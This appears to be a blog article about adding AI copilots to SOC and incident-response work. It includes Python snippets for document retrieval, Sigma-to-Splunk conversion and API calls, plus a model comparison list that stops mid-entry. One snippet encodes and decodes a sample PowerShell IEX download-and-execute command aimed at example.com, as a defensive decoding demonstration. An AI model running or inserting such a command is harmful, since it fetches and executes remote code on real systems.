AI in the SOC: What Works, What Doesn’t, and How to Start

Blue teams operate in chaos: unpredictable incident volumes, inconsistent data quality, and fragmented visibility across systems. The challenge isn’t just alert fatigue—it’s reconciling data from disparate log sources fast enough to respond effectively. We rarely know how many incidents will hit in a day, and when they stack up, it leads to analyst burnout.

It’s one thing to have a lot of work on, but with novel attacks and ambiguous alert messages, it’s not just the volume of alerts; it’s the complexity. In both incident response and SOC roles, there’s an unofficial requirement to figure it out and get to the bottom of things.

Each incident or alert can involve systems that generate logs in different formats, each with its own syntax and visibility gaps. It’s learning under pressure: interpreting log files and trying to classify user behaviour while minimising the time a threat actor spends inside the environment.

With everything changing so quickly, it’s just not possible for everyone to be across everything. A surface-level understanding is no substitute for the SME knowledge that one or two people on the team hold. If they’re busy or on leave, you’ll know the pressure I’m talking about.

Of course, this is where AI comes in.

Think of the most recent tricky incident you were assigned. It was tricky because you didn’t have all the answers on log messages, log file locations, or the attack path, right? It could be something else, but this is our example for today.

You’re going through the EDR and the SIEM, pulling individual artifacts from systems, digging through Teams chats and email, and maybe even system build documentation that’s a decade old.

Instead, imagine a cyber copilot trained on your environment, your tooling and your logs, with the reach to look up external knowledge bases. It won’t replace your experience, but it gets you to an answer more quickly and gives you something to validate ideas against, especially when you’re stuck on evidence that makes little sense.

What kinds of data should you train your copilot on?

- SOPs
- Your IR playbooks
- CMDB
- Past incident reports (post-mortems or PIRs)
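To make that concrete, here’s a minimal sketch of the retrieval half of such a copilot. It’s an illustration only: TF-IDF stands in for the embedding model a production system would use, and the knowledge_base folder, file names and query are placeholders for your own SOPs, playbooks and PIRs.

```python
# Minimal retrieval sketch: find the most relevant internal doc for an analyst query.
# TF-IDF is a stand-in for real embeddings; paths and the query are placeholders.
from pathlib import Path

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Load your internal knowledge base (SOPs, playbooks, PIRs) as plain text files.
docs = {p.name: p.read_text() for p in Path("knowledge_base").glob("*.md")}
names, texts = list(docs), list(docs.values())

query = "lateral movement via PsExec on a domain controller"

# Vectorise the documents plus the query, then rank documents by cosine similarity.
vectoriser = TfidfVectorizer(stop_words="english")
matrix = vectoriser.fit_transform(texts + [query])
scores = cosine_similarity(matrix[-1], matrix[:-1]).ravel()

# The top-scoring documents become the context you feed to the LLM prompt.
for idx in scores.argsort()[::-1][:3]:
    print(f"{scores[idx]:.2f}  {names[idx]}")
```

In a real deployment, the top-scoring documents get stuffed into the LLM’s prompt as context. That retrieval step is what gives you the “trained on your environment” effect without actually fine-tuning a model.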

The result is a copilot with unique context about your organisation. It’s not just inducted; it’s been on the team for years and remembers the time someone went threat hunting on a Friday and you ended up doing incident response all weekend.

This is where I see one of the first use cases for a cyber copilot: during a large-scale incident, or just day to day, explaining log messages and investigating multiple suspicious alerts at once.

It’s like hiring another DFIR person who is always on, never forgets context and actually reads the documentation.

Hopefully, you’re seeing how this could change your investigation processes for the better. I get it, though, these are pretty high-level. What about some other use cases?

- SOC Triage: AI can summarise alerts, link related activity, and surface patterns, like a sudden burst of failed logins followed by suspicious PowerShell usage.
- DFIR Support: During an investigation, AI can help build timelines (one of my favourite and critical steps to start with), map activity to MITRE techniques, and draft initial findings while the rest of the team focuses on containment and eradication.
- Threat Hunting (don’t do this on a Friday!): Need to search 5,000 systems for signs of persistence? Ask your AI to generate a Sigma rule based on a specific registry key or a reference from the LOLBin project, then translate it into the syntax your SIEM uses; see the sketch below.
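As a sketch of that last workflow: once the AI has drafted a Sigma rule, translating it into your SIEM’s query language can be automated. The example below assumes the pySigma library with its Splunk backend (pysigma-backend-splunk); your SIEM will have its own backend, and the Run-key rule here is illustrative, not a vetted detection.

```python
# Convert a (hypothetical, AI-drafted) Sigma persistence rule into a Splunk query.
# Assumes: pip install pysigma pysigma-backend-splunk
from sigma.collection import SigmaCollection
from sigma.backends.splunk import SplunkBackend

rule_yaml = """
title: Run Key Persistence (illustrative)
status: experimental
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'
    condition: selection
level: medium
"""

rules = SigmaCollection.from_yaml(rule_yaml)
# Without a processing pipeline the field names pass through unmapped;
# in practice you'd add a pipeline that fits your index and sourcetypes.
print(SplunkBackend().convert(rules)[0])
```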

The biggest benefits won’t come from the next shiny vendor product that’s just more of the same. They’ll come from using AI to capture and reuse your team’s institutional knowledge, like your playbooks, your PIRs and your lessons learned, so that the next incident doesn’t start from scratch.

Here’s something I wish I had 15 years ago: an always-on mentor. When I started my first IT job on the Microsoft helpdesk, we had ‘Mentors’ who had a little triangular orange flag on their desk. If you got stuck on a call, you could put the customer on hold and talk to them. These guys knew it all. They were gods amongst the junior techs.

Now we have AI mentors. Anyone can ask: “What does this obfuscated PowerShell command do?”

The response is something like: “This is likely using IEX to execute a remote payload, commonly associated with initial access via phishing. Related MITRE techniques: T1059, T1204.”

Brilliant, isn’t it? There’s a time and a place to learn how to decode obfuscated PowerShell, and I’m referring to the more advanced encoded scripts here, not just base64.
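If the “not just base64” comment has you curious, the simple case really is a one-liner. PowerShell’s -EncodedCommand flag takes base64 over UTF-16LE text, so a quick round trip in Python looks like this (the sample command is a harmless stand-in, and example.com is a reserved test domain):

```python
import base64

# Encode a benign sample the way -EncodedCommand expects it: UTF-16LE, then base64.
sample = 'IEX (New-Object Net.WebClient).DownloadString("http://example.com/p.ps1")'
encoded = base64.b64encode(sample.encode("utf-16-le")).decode()

# Decode it the way an analyst would when it turns up in process creation logs.
print(base64.b64decode(encoded).decode("utf-16-le"))
```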

AI is always available for your juniors, or anyone trying to solve a challenging problem when analysing an incident.

If you’re wondering how to get started, all you need to do is pick a model. Different models respond differently, and newer ones need less prompting experience to get good results. As I mentioned earlier, the internal documentation behind your copilot is probably best not uploaded to the cloud; that said, OpenAI’s policy for enterprise clients states that uploaded data will not be used to train their models.

Once the genie is out of the bottle, though, I don’t think it can go back (you may not have a right to delete your data), so proceed with caution.

Here are some models you can try, both local and cloud-based.

OpenAI GPT-4

Type: Cloud (API available)

URL: https://www.chatgpt.com

Description: GPT-4 is arguably the most mature LLM for reasoning, log summarisation, code interpretation, and language flexibility. Combined with Microsoft’s Azure offering, it can be deployed behind private network endpoints with strict egress controls.
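For a feel of the API side, here’s a minimal triage call using the openai Python package. The model name, system prompt and log line are all placeholders of mine, and in an enterprise setting you’d point the client at your Azure OpenAI endpoint rather than the public API:

```python
# Minimal triage prompt via the openai package (pip install openai).
# Assumes OPENAI_API_KEY is set in the environment; the log line is a made-up sample.
from openai import OpenAI

client = OpenAI()
log_line = "EventID 4688 New Process: C:\\Windows\\Temp\\svch0st.exe Parent: winword.exe"

response = client.chat.completions.create(
    model="gpt-4",
    messages=[
        {"role": "system", "content": "You are a SOC triage assistant."},
        {"role": "user", "content": f"Explain this log line and map it to MITRE ATT&CK:\n{log_line}"},
    ],
)
print(response.choices[0].message.content)
```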

Ollama + Mistral 7B / LLaMA3 (Local LLMs)

Type: Local / Offline

URL: https://ollama.com

Description: Ollama makes it dead simple to run powerful open-source models like Mistral and LLaMA3 on your own machine, fully offline. Ideal for air-gapped IR environments or teams worried about data privacy.
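To show how little glue that takes, Ollama exposes a local REST API on port 11434. A sketch assuming you’ve installed Ollama and run `ollama pull mistral` (the prompt is just an example):

```python
# Ask a local Mistral model to explain a log message; nothing leaves the machine.
import requests

resp = requests.post(
    "http://localhost:11434/api/generate",
    json={
        "model": "mistral",
        "prompt": "Explain Windows event ID 4625 and common causes of a sudden burst of them.",
        "stream": False,  # return one JSON object instead of a token stream
    },
    timeout=120,
)
print(resp.json()["response"])
```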

Claude 3 (Anthropic)

Type: Cloud (API available)

URL: https://www.anthropic.com

Description: Claude 3’s long context window (up to 200K tokens) makes it excellent for large log ingestion, timeline reviews, and structured parsing. It handles technical prompts better than GPT-3.5 and competes closely with GPT-4.

Ideal for: Teams working with large logs, memory dumps, or reports that exceed GPT-4’s token limits.

Google Gemini Pro (formerly Bard)

Type: Cloud (API available)

URL: https://ai.google
